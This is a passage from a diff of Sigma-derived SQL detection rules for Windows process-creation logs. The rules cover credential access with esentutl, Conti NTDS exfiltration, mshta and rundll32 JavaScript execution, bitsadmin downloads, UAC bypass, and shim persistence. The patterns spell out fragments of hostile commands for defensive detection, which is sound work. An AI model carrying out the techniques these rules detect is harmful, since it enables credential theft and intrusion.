'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "status": "test", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "To be determined" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_esentutl_params.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winzip_password_compression.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Always Install Elevated MSI Spawned Cmd And Powershell", + "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "status": "test", - "description": "Detects a 
suspicious RDP session redirect using tscon.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Firewall Rule Deleted Via Netsh.EXE", + "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate use" + "Legitimate administration activity", + "Software installations and removal" ], 
- "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_netsh_fw_delete_rule.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": 
"Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1053.005" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' 
ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], + "title": "Uncommon One Time Only Scheduled Task At 00:00", + "id": "970823b7-273b-460a-8afc-3a6811998529", + "status": "experimental", + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "author": "pH-T (Nextron Systems)", "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "title": "Trickbot Malware Activity", + "id": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", + "status": "stable", + "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1559" ], "falsepositives": [ 
- "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%DllRegisterServer%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_malware_trickbot_wermgr.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "Suspicious JavaScript Execution Via Mshta.EXE", + "id": "67f113fa-e23d-4271-befa-30113b3e08b1", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of javascript code using \"mshta.exe\".", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_mshta_javascript.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. 
UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "HackTool - RedMimicry Winnti Playbook Execution", + "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", + "author": "Alexander Rausch", "tags": [ "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1106", + "attack.t1059.003", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + 
"title": "Conti NTDS Exfiltration Command", + "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to exfiltrate NTDS", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.collection", + "attack.t1560" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_malware_conti_7zip.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "Tor Client/Browser Execution", + "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "status": "test", + "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_browsers_tor_execution.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", - "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "title": "Possible Shim Database Persistence via sdbinst.exe", + "id": "517490a7-115a-48c6-8862-1a481504d5a8", + "status": "test", + "description": "Detects installation of a new shim using sdbinst.exe. 
A shim can be used to load malicious DLLs into applications.", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", + "attack.persistence", "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1546.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((NewProcessName LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_sdbinst_shim_persistence.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", - "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "title": "Suspicious Mshta.EXE Execution Patterns", + "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "status": "experimental", + "description": "Detects suspicious mshta process execution patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' 